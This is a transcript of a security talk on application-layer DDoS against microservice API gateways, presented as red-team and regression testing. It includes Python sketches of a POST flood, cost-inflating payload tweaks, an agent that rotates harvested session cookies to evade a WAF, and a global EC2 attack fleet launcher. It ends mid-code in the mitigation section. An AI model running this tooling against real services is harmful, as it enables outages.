We're going to start with a number: $1.71. That's what it cost Jeremy and me to run a five minute test against Netflix.com in production, against one of our evacuated regions or data centers, and cause a five minute service outage.

We're going to go back a little bit in time and start with this medieval picture here. You can imagine sieging a castle with a battering ram. There are archers sitting on top of the castle, and they're shooting arrows down and picking people off. You can think of that as your firewall: we're doing our denial of service, we're trying to brute-force our way in, and we're losing a lot of life. We're doing work, but we're actually getting hurt. This next image is Genghis Khan sieging a castle, and up here he's taking bodies infected with the bubonic plague and catapulting them over the castle walls, so the contagion spreads to the inhabitants. For a lot less work, and a lot less death on the attacker's side, he's able to cause an amplification: the inhabitants die, and it's much more effective. That's really the ethos of the talk today.

We're going to present why application denial of service attacks matter and why they're extremely relevant in microservice architectures. We'll start off by explaining what application DDoS is. We'll step into an introduction to microservices — who here is familiar with microservice architectures? That's awesome, great, so we'll go through that quickly. We'll talk about application DDoS in microservices. I'll walk you through a framework we've developed to help you identify application DDoS in your own environments. We'll also do a case study where we look at what we did against Netflix.com, and we'll introduce you to the tools we are open sourcing today: Repulsive Grizzly, which is our application DDoS framework, and Cloudy Kraken, which is our AWS red team orchestration framework. We'll then do a demo, discuss some mitigation strategies and a call to action, and go over some future work ideas we have.

So, application denial of service is just denial of service focused on application layer logic. You've probably attended talks that focus on the network layer, and you've probably heard terms like amplification attacks, et cetera. We've decided to focus on the application layer because we found that in certain circumstances you can cause applications to become very unstable with far fewer requests.

When we were doing research we found that application DDoS isn't that novel, and we pulled this from the Akamai State of the Internet security report. If you notice in the upper left-hand corner here, it accounts for basically 0.6% of all DDoS, so it's not very common. And if we look at what kind of application DDoS it is, most of what Akamai saw were GET requests — somebody hitting a URL — and only 10% of all application DDoS were POSTs, where I'm sending a request body to the web server, potentially with a little more sophistication. So although it's not very common, it's happening, which means attackers are aware of it: they know this is an exploitation vector and they're using it in certain circumstances.

So, a quick introduction to microservices. Microservices are basically a collection of small, loosely coupled but collaborative services.
Think of them as really lightweight services that boot quickly, solve simple problems, and are often pretty small blobs of code. Sometimes they're single purpose, sometimes they have just a few purposes. The idea is that instead of having a giant monolith — a huge Java application — you'd have an environment where what used to be that giant Java application is now 50 or 60 different services connected together. That provides some really unique benefits for companies that have really large environments and large customer demand.

So who uses microservices? I work for Netflix, so we do. Anybody here work for a company that uses microservices? Awesome. So here are some companies that use them.

With microservice architectures there are a couple of different approaches. We're going to focus today on what's known as the API gateway architecture. You might work for a company, or be familiar with microservice architectures, that are more grid based or mesh based; those are outside the scope of today's discussion.

So, a quick primer — I mentioned we'll be focusing on an API gateway infrastructure. You can see in the image here that an API gateway is your single entry point. It's the system that sits on the edge, the one that's internet accessible, and it provides an interface to your middle tier and back end services. Think of it as a place where you can invoke calls that then federate through your middle tier and back end services. Those middle tier and back end services might provide libraries to the API gateway, and maybe those libraries let the gateway make REST calls, maybe it's gRPC or some other RPC framework. The specific examples we'll discuss today are REST based.

Another concept I wanted to touch on is circuit breakers. In this diagram, you can think of the circuit breaker as living in that gateway — once again, the centralized API service. The supplier you can think of as a middle tier service, and the client could be your web browser. At some point there's a connection problem, and the API gateway starts getting timeouts. After a certain number of timeouts, it fails fast: it trips the circuit and says, I'm no longer going to try to make requests to that middle tier service, I'm just going to return a generic error. Maybe I'll return some sort of fallback experience so the person using my site still gets some value. The idea is that it gives your middle tier services time to recover. A couple of things you have to take into consideration are how you choose the timeout and how long the breaker should stay tripped.

Cache is another important concept that's often leveraged in microservice architectures, and the focus here is really just to speed up response time. The idea is that if we know what a user or a particular use case needs, let's cache that data up front and return it very fast. That reduces the load on the services fronted by the cache, so you ultimately need fewer servers in your middle tier and back end.
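Before moving on, here's a minimal sketch of the circuit breaker pattern just described. The class name, thresholds, and fallback are illustrative assumptions — this is not how Zuul, Hystrix, or any particular gateway actually implements it — but it shows the fail-fast behavior and the two tuning questions (per-call timeout and how long the breaker stays open).

```python
import time

class CircuitBreaker:
    """Tiny illustration of the circuit breaker pattern described above."""

    def __init__(self, max_failures=5, reset_after=30.0, call_timeout=2.0):
        self.max_failures = max_failures   # how many timeouts/errors before we trip
        self.reset_after = reset_after     # how long the breaker stays open (seconds)
        self.call_timeout = call_timeout   # per-request timeout to the middle tier
        self.failures = 0
        self.opened_at = None

    def call(self, supplier, fallback):
        # supplier is e.g. a function wrapping an HTTP client call that raises on timeout.
        # While the breaker is open, fail fast and return the fallback experience.
        if self.opened_at is not None:
            if time.time() - self.opened_at < self.reset_after:
                return fallback()
            self.opened_at = None          # half-open: give the supplier another chance
            self.failures = 0
        try:
            result = supplier(timeout=self.call_timeout)
            self.failures = 0
            return result
        except Exception:                  # timeout or error from the middle tier service
            self.failures += 1
            if self.failures >= self.max_failures:
                self.opened_at = time.time()   # trip the breaker
            return fallback()
```

The two questions called out above map directly onto `call_timeout` and `reset_after`: too aggressive and the breaker trips under normal load, too lenient and the middle tier gets hammered before it ever trips.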
Okay, now that we've got the introductions out of the way, I want to talk about some common application DDoS techniques. Application DDoS is not new or novel; we've found references to it from 15 or 20 years ago. A lot of the focus has traditionally been on regular resources and I/O: things like CPU, memory, cache, disk, network, SQL, etc. But now that our application environments are becoming a little more sophisticated, there are actually more interesting attack vectors we should be exploring. Things like queuing and batching: how do middle tier and back end services queue and process requests? What are the library timeouts? As we mentioned before, circuit breakers will potentially trigger if certain timeouts are hit, so can we take advantage of an application that doesn't tune its timeouts correctly? What about health checks? Obviously the services need to let each other know when they're healthy. What if we could focus our attack specifically on the health check? Even if the service was fine, if we could cause the health check to fail, we might be able to cause some service instability. And then there are things that don't auto scale. You can imagine a giant Java monolith or a back end database — and when we say auto scale, think of it as the concept of "my service has gotten a lot of work, so I'm going to boot more of myself." A giant database might not be able to boot a lot of copies of itself very quickly, so that might be another area you want to focus your attack on.

What I really want to drive home is that there's a difference between monolithic denial of service and microservice denial of service. I would say most monolithic application DDoS is one to one, meaning you're sending some work to the service and it's happening on that box: it's doing some calculation, so it's roughly a one-to-one work-per-request ratio. I say "most" because there are monolithic applications where you might be able to get a little bit of amplification going, but in general it's happening on a single system. Microservice application DDoS is often one to many, because we might make a request to the gateway that federates out to tons of middle tier and back end services, and if we construct those requests correctly, we might be able to cause a lot of work. Each one of those microservices in the middle tier and the back end has different characteristics: different health checks, different timeouts, potentially different system builds and configurations. There are a lot of places where we might be able to cause havoc if the system can't handle the requests we're sending through.

So here's a new school microservice API DDoS example. Here's little Jimmy, our 90's kid — here's Jeremy, typing with gloves on. That's how we all hack, right? The idea is that here we have the edge; you can think of the edge as the things you'd be able to hit in your browser. We have our proxies and our website — maybe this is static assets and whatnot — and another proxy. We have our API gateway here, which once again provides that interface to the middle tier and back end services. So we fire up our script. It's a Python script; let's assume it's, I don't know, 200 threads or something. We're POSTing to recommendations, and there's a JSON blob that says — I can't quite see it, but it says — range 0 to 10,000. Okay? So that call flows in and the API gateway starts making many client requests. Let's assume it starts pegging those middle tier services for those 10,000 recommendations. The middle tier services start making many calls to the back end services, maybe to retrieve data. The back end service queues start filling up with expensive requests. And now we've reached that sweet spot: client timeouts start happening, circuit breakers might trigger. Maybe some of the data comes back, maybe not all of it. Maybe a fallback experience is triggered — and once again, you can think of a fallback experience as "hey, I don't know what to do, so I'm going to give you some data to work with," so that your customers can still browse the site. Cool.
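As a sketch of what little Jimmy's script in that walkthrough might look like — the endpoint, the payload shape, and the 200 threads all come from the hypothetical example above; nothing here is a real API:

```python
import threading

import requests

API = "https://api.example.com/recommendations"   # hypothetical gateway endpoint from the example
PAYLOAD = {"range": {"from": 0, "to": 10000}}     # ask for far more objects than a browser ever would
THREADS = 200

def worker():
    session = requests.Session()
    while True:
        try:
            r = session.post(API, json=PAYLOAD, timeout=30)
            # A slow 200, a 503, or a 504 each tell us something about how the gateway is coping.
            print(r.status_code, round(r.elapsed.total_seconds(), 2))
        except requests.RequestException as exc:
            print("error:", exc)

if __name__ == "__main__":
    for _ in range(THREADS):
        threading.Thread(target=worker, daemon=True).start()
    threading.Event().wait()   # run until interrupted
```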
So let's dig in a little bit more on that with another example — the same sort of attack. We have a single request asking for 1,000 objects that are not in cache. I mentioned that the objects not being in cache is extremely important, because cache is fast — it's hella fast. If we're trying to exploit an application DDoS vulnerability and we're only targeting things that are in cache, we're not going to be successful. So we have to perform a cache miss attack. Now, if you Google "cache miss" you're going to find stuff about Intel processors; this is much higher in the stack. Really all we're doing here is figuring out what's in the cache — obviously if you're testing this in your own environment or for your own company, you might have a good idea what's in the cache — and then making calls that require lookups outside the cache. Often, if you specify really large request ranges and object sizes, you can pull this off.

So we'll step back through the example again. We have that single request asking for a thousand objects not in the cache. The middle tier library, whatever it is, doesn't support batching, so the gateway basically has to make an RPC call for every object we're asking for. Since we're asking for a thousand objects and two middle tier services have to respond for this specific request, that results in 2,000 RPC calls. Those middle tier services then need to call the back end services — three back end services each — for 6,000 calls. You start seeing the trend here: there's an opportunity for a lot more requests to happen once we get past the API gateway.

So what is the workflow for identifying application DDoS? The first thing you need to do is identify the most latent service calls: which calls are going to be the most expensive and touch the most middle tier and back end services? Once you identify those, you want to investigate ways to manipulate them. How do we make them more expensive? How do we get those calls to touch more services? Once we've determined those circumstances, we want to learn more about the API gateway's error conditions. How do we know our attack is working? How do we know when we're being blocked by a firewall? What are the thresholds and timeouts of the particular clients we're targeting? Once you build that story up, you need to tune your payload to fly under the WAF, and we'll discuss a couple of techniques you can use to do that. Then we test our hypothesis at a small scale, and finally we scale the test up using the orchestration framework and our Repulsive Grizzly attack framework, which we are open sourcing today. Thank you. Cool.
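Before walking through how to find these calls in your own environment, here are the numbers from that fan-out example as a quick back-of-the-envelope calculation, using the assumptions stated above (no batching, two middle tier services for the request, three back end services behind each):

```python
# One gateway request in the example above, with no batching support downstream.
objects_requested = 1000         # objects asked for in a single request
middle_tier_services = 2         # middle tier services consulted for this request
backends_per_middle_tier = 3     # back end services each middle tier service must call

gateway_to_middle_tier = objects_requested * middle_tier_services           # 2,000 RPC calls
middle_tier_to_backend = gateway_to_middle_tier * backends_per_middle_tier  # 6,000 RPC calls

print(f"1 edge request -> {gateway_to_middle_tier} middle tier RPCs "
      f"-> {middle_tier_to_backend} back end RPCs")
```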
So, identifying latent service calls. I'll admit that this approach is error prone, but it's a good first step if you're just getting started with this process. Open up the developer console in Chrome, click the "preserve log" button, and just start browsing the site. After some period of time, sort by time and look at those requests — those POST requests to your API gateway. I'll mention why this is a little error prone: as you can imagine, just because a call doesn't show up as latent doesn't mean it couldn't be made latent, so you might miss some opportunities here. I actually think a better approach would be to automate this. You can imagine a spidering tool that would crawl your applications, doing a fair bit of sampling to figure out which calls are the most latent. So I think there's room for us to improve on ways to identify those calls automatically.

Sorry — the laptop froze. Sorry about that, guys, give me just a second here. We have a backup. Cool, thanks.

All right. So let's assume we've identified an interesting latent service call. The first thing I might do is say: I found this call, but I'm not sure if it's interesting or not yet. It might be a little hard to see in the back, so I'll walk through it. Here we have a POST request to some licensing endpoint with a bunch of encrypted data. When I Base64 decoded it and started messing with it, it just returned a fast error code. There wasn't really anything for me to tweak, even though the call was latent: changing the input didn't result in increased latency. So this is an example of a call that might not be a good attack vector.

Here's another call that might be a little more interesting. Once again, it's a POST to that recommendations endpoint we've been using as our example, and you'll notice in the JSON body that there's an array of items. I observed that when I added more items to that list, it resulted in a longer response time, and if I added too many items, I got a special error code. Okay, that's kind of cool — changing the input resulted in increased latency of the API calls.

A more accurate way to find latent service calls is to have visibility into what your middle tier and back end services are doing. This is a dashboard we have at Netflix that helps us identify that, and I'm zooming in on three areas that I think are interesting. The first is requests per second: how many times is a particular service being invoked? The next is cache response: does this service actually cache content? And the most interesting bit here is latency — it's doing a roll-up of latency at the 90th percentile of requests, and we see we have one call here that averages two seconds. That's interesting. So a technique I might use here is: I know these services can be invoked via the API gateway. Maybe I didn't find them with that original discovery method I discussed, but I could probably step my way back through the documentation on the API gateway and figure out how to invoke those latent service calls. If you're in a position where you can actually see this, you're going to have a much higher chance of finding those latent calls.
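A very rough sketch of the "automate this out" idea — sample each candidate call a few times and rank by observed latency. The endpoints and payloads here are placeholders; in practice you'd feed in whatever your spider or API documentation turns up:

```python
import statistics

import requests

# Hypothetical candidate calls discovered by crawling the site or reading API docs.
CANDIDATES = [
    ("POST", "https://api.example.com/recommendations", {"items": list(range(50))}),
    ("POST", "https://api.example.com/license",         {"blob": "AAAA"}),
    ("GET",  "https://api.example.com/profile",          None),
]

def sample_latency(method, url, body, attempts=5):
    timings = []
    for _ in range(attempts):
        r = requests.request(method, url, json=body, timeout=30)
        timings.append(r.elapsed.total_seconds())
    return statistics.median(timings)

if __name__ == "__main__":
    ranked = sorted(
        ((sample_latency(m, u, b), m, u) for m, u, b in CANDIDATES),
        reverse=True,
    )
    for latency, method, url in ranked:
        print(f"{latency:6.2f}s  {method:4s} {url}")
```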
So once we've identified those latent calls, let's discuss some attack patterns we can leverage to make them more expensive. The first is range; we'll also discuss object-out-per-object-in, manipulating request size, and then just a combination of everything. There are other vectors here, but these are the three we found to be the most effective.

The first technique is range. You'll see here that we have a request for items — once again, recommendations — and we have a "from" and a "to". So if we normally go from 1 to 2, what if we change it to 1 to 200, to 20,000, to 2 million? You're probably thinking to yourself, huh, this feels a lot like what a scraper might do.

Oh, did the projector just start doing that? There we go, it's glitching a little bit. Sorry about that — hopefully it doesn't give you a headache back there, guys. So what we basically observed was that we could increase the range, and this technique is really similar to what content scrapers use. That glitch is obnoxious — we'll keep going and skip over that note. Cool.

All right, on to the next one: object out per object in. Here we've identified a direct object reference — we have an ID here. So what if we send more of those in? Yeah, can you see if you can get that working? Cool. The idea is that if we enumerate more objects — if we send more objects in — maybe we'll see an increase in response size. Sorry, an increase in response time. Thank you. Cool.

Request size is another technique we can take advantage of. As you can see in the corner here, we have an element called art size, and it has a range of 342 by 192. Imagine appending a zero onto the end of that: if that art size is calculated in real time, you can imagine that might result in increased latency. So once again, that's another knob we can potentially toggle. And you've probably noticed that a lot of this feels like what a content scraper might do when it's trying to pull a catalog off a site — manipulating the range of your requests. That's ultimately what a lot of these techniques are: the same stuff a content scraper uses.

Or we can use a combination. Let's just turn all the knobs we possibly can. What about languages? You probably noticed English and Spanish — what if we add French, Cantonese? Or what about these object fields it's obviously looking for: description, title, artwork? Maybe if we put more object fields in there, we would touch more microservices.
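To show what "turning all the knobs" might look like in practice, here's a sketch that takes a baseline recommendations payload and produces progressively more expensive variants. The field names and values are made up for illustration; they're modeled loosely on the examples above, not on any real API:

```python
import copy
import json

# Baseline request body (field names are hypothetical).
baseline = {
    "items": {"from": 1, "to": 2},
    "ids": ["movie-123"],
    "artSize": "342x192",
    "languages": ["en"],
    "fields": ["title"],
}

def variants(payload):
    # Knob 1: range -- ask for a far larger window of results.
    v = copy.deepcopy(payload)
    v["items"] = {"from": 1, "to": 2_000_000}
    yield "range", v

    # Knob 2: object-out-per-object-in -- send many IDs instead of one.
    v = copy.deepcopy(payload)
    v["ids"] = [f"movie-{i}" for i in range(1000)]
    yield "object count", v

    # Knob 3: request size -- ask for artwork an order of magnitude larger.
    v = copy.deepcopy(payload)
    v["artSize"] = "3420x1920"
    yield "request size", v

    # Combination: every knob at once, plus extra languages and object fields.
    v = copy.deepcopy(payload)
    v.update(
        items={"from": 1, "to": 2_000_000},
        ids=[f"movie-{i}" for i in range(1000)],
        artSize="3420x1920",
        languages=["en", "es", "fr", "yue"],
        fields=["title", "description", "artwork"],
    )
    yield "combination", v

for name, body in variants(baseline):
    print(name, len(json.dumps(body)), "bytes")
```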
The next thing you want to do is build a list of indicators of API health. As I mentioned before, with the API gateway you want to know whether your attack is being successful. So first: what's a healthy response? Probably an HTTP 200. When does your API gateway time out? What that basically means is that your API gateway is under so much distress that it literally cannot function anymore. In our test example we got a 502 Bad Gateway; in your environment you might get a 500, maybe a stack trace, maybe something on the server — but there will likely be some indicator that your API gateway is not healthy. Next, what about those middle tier services? If they're not healthy, we might see something like a 503 Service Unavailable, or that might let us know that one of the circuit breakers has been triggered. What about a WAF? If we've sent too much work, or too many requests, and we're getting blocked, we might get a 403 Forbidden. Or the rate limiter: if you're in an environment that actually has a rate limiter — and know that that's not very common — you might see something like a 429. Then there are framework exceptions. These are kind of interesting and somewhat unique: you might end up in a position where the application wanted to do some work but just gave up and said, you're asking me for too much.

And then there are other indicators. If we zoom in here, I got an HTTP 200 OK, but look at the latency — that's like 16 seconds — and it's a huge response. HTTP 200 plus high latency is kind of the holy grail: it means you're causing a lot of work on the back end. Another thing you might see is an empty response: you send something, it takes 16 seconds to return, and you get nothing back. You'll start getting these weird error conditions when you send enough traffic at the services. And obviously look for correlations: while you're running your test, are there other systems being impacted that you should take into consideration?

Once we've built out that latent request, we need to find the sweet spot, and really that's finding the right balance between the number of requests and the logical work per request — because, as we mentioned, we have a lot of knobs we can tweak to make more work happen per request. There's going to be some region where the service is healthy, and a region where the service is impacted, when there are enough requests and enough logical work per request. If we send too many requests too fast, or too much work per request too fast, we're going to get rate limited — and once again, you can think of rate limiting as the firewall kicking in and blocking us. If we don't send a lot of requests but the logical work per request is high, the service might scale up: it might boot more of itself and stay healthy. So really our job is to find the skull and crossbones on this chart — the sweet spot just under where we'd get blocked, and just enough to cause the service to be disrupted.

So, a quick case study. It all started with this HTTP status 413. Has anybody seen this status code before? It was kind of new for me. The description is "the request entity is larger than the server is willing or able to process." Ding — that sounds really interesting, right? It literally gave up. So what we tried to do was figure out how to get rid of the 413; we actually wanted a "better" status code — we wanted the service to do the work and not quit right out of the gate. So I had to make the call more expensive. Once again, I was tweaking those knobs we discussed in the framework section of the talk, and I got to a spot where I was able to get a relatively large response size, and it was pretty darn latent.
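Before scaling anything up, it helps to pull the error-condition indicators from a couple of sections back into one place. Here's a rough sketch of how an attack agent might label each response it gets while a test is running — the thresholds are arbitrary examples, not values from our tooling:

```python
def classify(status, latency_seconds, body):
    """Map a single response onto the health indicators discussed above."""
    if status == 502:
        return "gateway timed out (gateway unhealthy)"
    if status == 503:
        return "middle tier unavailable / circuit breaker likely open"
    if status == 403:
        return "blocked by the WAF"
    if status == 429:
        return "rate limited"
    if status >= 500:
        return "framework exception or other server error"
    if status == 200 and latency_seconds > 10:
        return "200 but very slow -- back end doing a lot of work"
    if status == 200 and not body:
        return "200 with empty response -- something upstream gave up"
    return "healthy"
```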
Now, the next thing we wanted to do was test it at a smaller scale, and to do that we used Repulsive Grizzly. Repulsive Grizzly is a skunkworks application DDoS framework that we are open sourcing today. I mention that it's skunkworks because it is what it is — it's definitely not as documented or feature rich as some of the other projects I've open sourced — but the idea is that I'm hoping the community will build on it. I'm sure many of you have used other denial of service tools in the past. The reason we wrote Repulsive Grizzly is that we wanted a couple of special functions to help us exploit application DDoS in microservices, so let me walk through a couple of those. It uses eventlet for high concurrency, so it's super fast. It also leverages AWS SNS for logging — you can think of SNS as a messaging service — so when we run these attacks and scale them up, we have a place where the agents can write log messages and report their health while a test is running. It's pretty easy to configure, too.

So here's a mountain of cookies, aka sessions. Delicious, right? What we're trying to do here is bypass the WAF, and one of the features is the ability to round-robin authentication objects. You might sign up for the site, or maybe you've generated a bunch of session cookies for your particular application; you can use Repulsive Grizzly to iterate through those in a round-robin fashion so you can fly under the WAF if needed.

So here's a single node test. It might be a little hard to read in the back, so I'll walk you through what's going on. We fired up this specific attack agent and we start seeing some 200s, some 504s, and a ton of 503s, and as it goes on, more 503s and more 504s. I started getting pretty excited, because I realized that at this point I'd caused quite a bit of unhealthiness — there were some 200s coming through, but they weren't very common. So as I'm sitting there running the test, we have a few browsers open, I'm refreshing the page, and in general I'm just getting site errors. Every once in a while the site would come back.
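To give a flavour of how those pieces fit together — eventlet green threads for concurrency, round-robin session cookies, and SNS status logging — here's a heavily simplified sketch. This is not the actual Repulsive Grizzly code; the target URL, topic ARN, and cookie file are placeholders.

```python
import eventlet
eventlet.monkey_patch()       # patch sockets early so the green threads below run cooperatively

import itertools
import json

import boto3
import requests

TARGET = "https://api.example.com/recommendations"                  # placeholder target
SNS_TOPIC = "arn:aws:sns:us-west-2:123456789012:attack-status"      # placeholder topic ARN
CONCURRENCY = 200

sns = boto3.client("sns", region_name="us-west-2")

# Round-robin through pre-collected session cookies so no single session trips the WAF.
with open("cookies.txt") as fh:
    cookies = itertools.cycle([line.strip() for line in fh if line.strip()])

def fire(payload):
    r = requests.post(
        TARGET,
        json=payload,
        headers={"Cookie": next(cookies)},
        timeout=30,
    )
    # Publish each result to SNS so a central dashboard can track agent health during the run.
    sns.publish(
        TopicArn=SNS_TOPIC,
        Message=json.dumps({"status": r.status_code, "latency": r.elapsed.total_seconds()}),
    )

if __name__ == "__main__":
    pool = eventlet.GreenPool(CONCURRENCY)
    payload = {"range": {"from": 0, "to": 10000}}
    for _ in range(10_000):
        pool.spawn_n(fire, payload)
    pool.waitall()
```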
Next up is Cloudy Kraken, which is our orchestration framework. Jeremy is the author of that, and he'll walk you through how he approached it.

So, Scott came up with an awesome new attack for going after the application, but something like Netflix is a global service: there are lots and lots of WAFs, there are denial of service prevention mechanisms. So while he can run this from one laptop, that's really not going to cut it if we want to automate it. So now we're going to have a whole bunch of Cloudy Kraken nodes running, and a lot of Repulsive Grizzlies.

So what is it? It's a red team orchestration framework. It's written in Python and runs on AWS, and some of the key features: you get a fresh global fleet of instances every time you want to run a test, which really helps with getting fresh IP addresses and fresh CIDR blocks to get around what you might normally see with a WAF or DDoS protection. You get lots of good global IPs — a common thing you can do for DDoS protection is velocity based checking, where you watch how many requests a single IP address sends and block based on that. Another key point is that as you're doing these attacks, you want to try out more kinds of attacks and configs, so it has a lot of push, configuration, and automation built in: when you have a new attack to trial, you just run the script again and it rebuilds the global fleet and restarts your attack. Since it is a global attack, you want to make sure the timing is right, so it can be effective and so it can be reproducible — because the idea is that over time it's a great attack tool, but what you really want is for it to be a regression test, so you can check and see how your infrastructure handles it. So getting all these different instances around the world to start at exactly the same time and stop at exactly the same time is a key component. And lastly, we are in some cases attacking production environments, so if we make a mistake and attack the wrong thing, it's good to have an immediate kill switch to shut it all back down.

So, how many people have worked with AWS? We have different regions around the world, which are basically data centers, so we can push the instances out to different regions. We have a single S3 bucket and a single DynamoDB table that hold the configuration and the code that's actually going to run against the service under test. And, like we said before, SNS is a pub/sub messaging system, so the agents can send back all their status and we can build a status dashboard on the back end.

This is the general workflow of how Cloudy Kraken works. You put your attack code in a GitHub repo, and then it updates the code, pushes it out to S3, pushes it out to DynamoDB, and resets everything to get ready to go. Next it builds all of the environments — again, you get a fresh set of instances, and we definitely like to use instances and not Docker. The big reason why is that we can use enhanced networking, so while we're working, all the subnets and IP addresses get set up. Then it launches the instances, and using cloud-init it configures the machines: they download the code, configure themselves, and then wait to start the attack when the start time hits. As the attack is running, it collects all the data through SNS, and a big part is at the end, when we roll up all the exact results and the output we got.
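As a rough sketch of what the provisioning step of that workflow could look like with boto3: launch agents in several regions with user data that pulls the attack code and waits for a synchronized start time, plus a kill switch. The region list, AMI ID, bucket, and instance counts are placeholders, and the real Cloudy Kraken does considerably more (VPC and subnet setup, DynamoDB-driven config, result collection, teardown):

```python
import time

import boto3

REGIONS = ["us-west-2", "us-east-1", "eu-west-1", "ap-southeast-2"]   # hypothetical fleet layout
INSTANCES_PER_REGION = 10
CODE_BUCKET = "s3://example-bucket/attack-code.tar.gz"                # placeholder
START_AT = int(time.time()) + 300     # every agent starts at the same epoch second

USER_DATA = f"""#!/bin/bash
aws s3 cp {CODE_BUCKET} /opt/attack.tar.gz
tar -xzf /opt/attack.tar.gz -C /opt
# Wait for the synchronized start time, then run the agent.
while [ "$(date +%s)" -lt "{START_AT}" ]; do sleep 1; done
python /opt/agent.py
"""

def launch_fleet():
    fleet = {}
    for region in REGIONS:
        ec2 = boto3.client("ec2", region_name=region)
        resp = ec2.run_instances(
            ImageId="ami-00000000000000000",     # placeholder AMI (differs per region)
            InstanceType="c5.large",
            MinCount=INSTANCES_PER_REGION,
            MaxCount=INSTANCES_PER_REGION,
            UserData=USER_DATA,
        )
        fleet[region] = [i["InstanceId"] for i in resp["Instances"]]
    return fleet

def kill_switch(fleet):
    # Immediate shutdown of every agent if the wrong thing is being attacked.
    for region, instance_ids in fleet.items():
        boto3.client("ec2", region_name=region).terminate_instances(InstanceIds=instance_ids)

if __name__ == "__main__":
    print(launch_fleet())
```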
So now that we have the system built, we went ahead and ran the test. We tested it against the production environment of a service, using a multi-region, multi-agent setup. In this case we were running in four different regions with 10 instances per region — about 40 instances globally — each one running the attack. We conducted two different five-minute attacks, and then we had a chance to monitor their success and see how well they worked. From the simple view of our status dashboard, you'll see at the bottom all the nodes showing up saying, hey, I'm online, and then you'll see all the requests going through and what kind of status we got — the band at the top is going to be all the types of failures.

So here are the results of the test: we had an 80% failure rate. On any large UI or large service like Netflix or Hulu or anything else, you're going to have problems if 50% of your calls are failing — most of the UI will fail, or you'll have parts of the UI that rely on other parts. Once you get past a certain percentage, you're going to have a full user-facing failure. During the attack you can see the first run went great and we got really good results from it. For the second test we wrote some new code, pushed it really quickly, and tried again; it wasn't as effective, but this is why we like having that immediate ability to push out new code and retest, and to have a high velocity of deployments, just like we do with other services and microservices. So effectively, between all the cookies, all the different parts of the world, and all the IP addresses we were using, we were able to get our attack through.

And again, at the time we ran the test, it would have cost about $1.71 to run the whole thing and take out the production service we were attacking. These days it could probably be a little bit cheaper with spot instances, depending on the situation.

So what failed? We had a couple of things that I thought were pretty interesting and worth discussing. We identified expensive API calls that we could invoke with non-member cookies, and I'll explain what that is. I'm sure you've seen it when you browse a site: you get a JSESSIONID before you log in, or a PHP session ID, or some other session identifier. We observed that we could take those and issue them against the API — I just wrote a Selenium script and we dumped something like 5,000 cookies, and we used those in a round-robin fashion. That was an interesting finding. The expensive traffic resulted in many RPCs: it averaged out to about one call to the API gateway resulting in 7,200 RPC calls between middle tier and back end services. And the WAF wasn't able to monitor those middle tier RPC calls — it just wasn't configured to look at them.

So let's dive in a little on how this exactly worked, and then we'll show a demonstration. The first thing is that we have our attack agents cycling through multiple session cookies and IP addresses to bypass the WAF. Each request we make is asking for 7,200 expensive calculations from multiple back ends. The objects weren't in the cache, so we were getting cache misses. Each request we made took about 15 seconds to return a huge object store, and the queue kept taking longer and longer: we started noticing that 15 seconds became 18 seconds, 19 seconds, and as that queue continued to fill up, the service got more and more unhealthy. The middle tier services — sometimes they were returning 200s, they actually did return, but often they were returning some sort of 5xx, or a 200 that was really an exception. That was kind of interesting. And the API gateway had to start responding: it starts triggering circuit breakers, the WAF is kicking in, sometimes we're getting 403s, sometimes 503s, 200s, 504s. Ultimately all these RPC calls were really slamming the gateway, so it knew it needed to start scaling up, but it couldn't boot itself fast enough during the attack. Eventually the CPU on the API gateway pegged and we started getting gateway timeouts — we reached a point where the gateway itself could no longer facilitate requests.

Okay. So at this point in time we've already provisioned our attack environment, and we're going to run a Kraken attack here. The first thing we're going to do is configure the attack: the number of threads, the number of instances, and what region or data center — or regions, plural — we want to run it from. We'll run it from us-west-2, we're going to run attack 1, we'll run 20 threads per attack agent, we'll do 7 agents, and we'll run the test for 240 seconds.
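That run boils down to a handful of parameters. Here's roughly what that configuration looks like as data — the key names are illustrative, not Cloudy Kraken's actual schema:

```python
attack_config = {
    "attack": 1,                 # which attack payload/script to run
    "regions": ["us-west-2"],    # region(s) to launch agents in
    "agents": 7,                 # number of attack agent instances
    "threads_per_agent": 20,     # concurrent workers per agent
    "duration_seconds": 240,     # how long to run before shutting down
}
```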
All right, so here's our staging environment — this is where we did our testing — and you'll see that the site's online. We'll go ahead and pop over to the Amazon console to see how our agents are doing. We'll hit the refresh button and notice that the agents are in a pending state, so they're starting to boot up. As I mentioned before, Grizzly Tracker is what's listening to that central queue and showing us the status codes and the health of everything. Once those agents come online and they're running, we'll grab an IP address and SSH on, and I'll show you what's going on on those agents. At this point they're just booting up: installing all the packages they need and pulling down the Repulsive Grizzly attack framework. The agents phone home and start the attack. We see the green coming in, and now the status codes start flowing. I'll pause it here — we see some 503s, around 2,600 — so we know we've caused quite a bit of havoc. We'll continue to let it go; more 503s are coming in. We'll pop back up to the site and refresh — is it healthy? Yes. Okay, keep going. Keep going. Boom — a 504, origin read timeout. That's pretty good, right?

So how do you defend against this and mitigate it? I think the first and most important step is to understand which microservices impact your customer's experience. You need to know whether you have specific services that, if they become unstable, result in a cascading system failure. Once you have a good understanding of what those are, you need to put the proper security protections in place.

A good example: set good, reasonable limits on batch and object sizes. I shouldn't be able to make a request to your service that's absolutely obnoxious and abnormal — if your service usually returns 10 objects and somebody's asking for a million, you should have hard limits in place, and you should enforce those limits on both the client and the server.

The rate limiter, whenever possible — or your web application firewall — should monitor the middle tier signals, or the cost of a request. If we're only monitoring at the edge, and a single edge request is actually resulting in 7,200 requests, we need to know that. We should have visibility and insight into those middle tier services so we can enforce the right blocks and protections well before we end up in a cascading systems failure.

The rate limiter should also monitor the volume of cache misses. Once again, if your service has data in a cache, and most of the time those objects come from the cache, and you suddenly start seeing all these cache misses, it means one of two things: your cache is misconfigured, or somebody's doing something nefarious.

You want to prioritize authenticated traffic over unauthenticated. As I mentioned before, we had these basically unauthenticated sessions and we were able to use them to take down the service. Performing an authenticated denial of service attack is a lot more expensive: you actually have to get sessions, and although there are ways to do that, in general an authenticated attack is much harder to pull off.

You want to configure reasonable client library timeouts. If you set your timeouts too aggressively, we might be able to trip the circuit breaker without a lot of work; if you set them too leniently, we might be able to make the services really unhealthy before a breaker ever triggers. So you have to be conscientious about what your library timeouts are set to.
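As one concrete example of the "hard limits, enforced on the server as well as the client" advice above, here's a sketch of request validation in front of a batch endpoint. The limits and field names are arbitrary examples, not values any real gateway uses:

```python
MAX_ITEMS_PER_REQUEST = 50    # a service that normally returns 10 objects shouldn't return 1,000,000
MAX_RANGE_SPAN = 100

def validate_request(body):
    """Reject obviously abusive batch requests before any middle tier work happens."""
    errors = []

    ids = body.get("ids", [])
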